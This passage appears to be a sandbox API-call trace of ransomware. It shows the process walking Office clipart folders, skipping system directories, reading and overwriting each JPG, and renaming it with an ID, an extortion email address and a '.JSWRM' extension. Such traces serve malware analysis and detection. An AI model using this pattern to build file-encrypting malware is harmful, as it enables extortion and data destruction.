0x2473c0 [0089.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0089.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.668] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341653.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341653.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341653.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0089.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.669] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d7f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341654.JPG", cAlternateFileName="")) returned 1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2=".") returned 1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="..") returned 1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="...") returned 1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="windows") returned -1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="recovery") returned -1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="perflogs") returned -1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="documents and settings") returned 1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="system volume information") returned -1 [0089.669] lstrcmpiW (lpString1="J0341654.JPG", lpString2="msocache") returned -1 [0089.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0089.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341654.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341654.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341654.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0089.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0089.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341654.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341654.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341654.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0089.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341654.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.670] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15743) returned 1 [0089.670] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3d70) returned 0x24d210 [0089.670] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3d70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3d70, lpOverlapped=0x0) returned 1 [0089.673] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.673] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3d70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3d70, lpOverlapped=0x0) returned 1 [0089.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.673] CloseHandle (hObject=0x314) returned 1 [0089.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0089.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0089.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0089.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0089.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0089.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.674] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341654.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341654.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341654.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0089.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.674] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ec6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341738.JPG", cAlternateFileName="")) returned 1 [0089.674] lstrcmpiW (lpString1="J0341738.JPG", lpString2=".") returned 1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="..") returned 1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="...") returned 1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="windows") returned -1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="recovery") returned -1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="perflogs") returned -1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="documents and settings") returned 1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="system volume information") returned -1 [0089.675] lstrcmpiW (lpString1="J0341738.JPG", lpString2="msocache") returned -1 [0089.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341738.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341738.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341738.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341738.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341738.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341738.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341738.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.676] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20166) returned 1 [0089.676] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ec0) returned 0x24d210 [0089.676] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ec0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4ec0, lpOverlapped=0x0) returned 1 [0089.693] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.693] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ec0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4ec0, lpOverlapped=0x0) returned 1 [0089.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.693] CloseHandle (hObject=0x314) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0089.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0089.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0089.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0089.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0089.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.694] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341738.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341738.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341738.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0089.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.695] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x49ba, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341742.JPG", cAlternateFileName="")) returned 1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2=".") returned 1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="..") returned 1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="...") returned 1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="windows") returned -1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="recovery") returned -1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="perflogs") returned -1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="documents and settings") returned 1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="system volume information") returned -1 [0089.695] lstrcmpiW (lpString1="J0341742.JPG", lpString2="msocache") returned -1 [0089.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0089.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341742.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341742.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341742.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0089.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0089.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341742.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341742.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341742.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0089.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341742.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.696] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18874) returned 1 [0089.696] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x49b0) returned 0x24d210 [0089.696] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x49b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x49b0, lpOverlapped=0x0) returned 1 [0089.699] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.699] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x49b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x49b0, lpOverlapped=0x0) returned 1 [0089.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.699] CloseHandle (hObject=0x314) returned 1 [0089.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0089.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0089.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0089.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0089.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.700] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341742.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341742.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341742.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.701] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10bdc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382836.JPG", cAlternateFileName="")) returned 1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2=".") returned 1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2="..") returned 1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2="...") returned 1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2="windows") returned -1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2="recovery") returned -1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2="perflogs") returned -1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2="documents and settings") returned 1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", 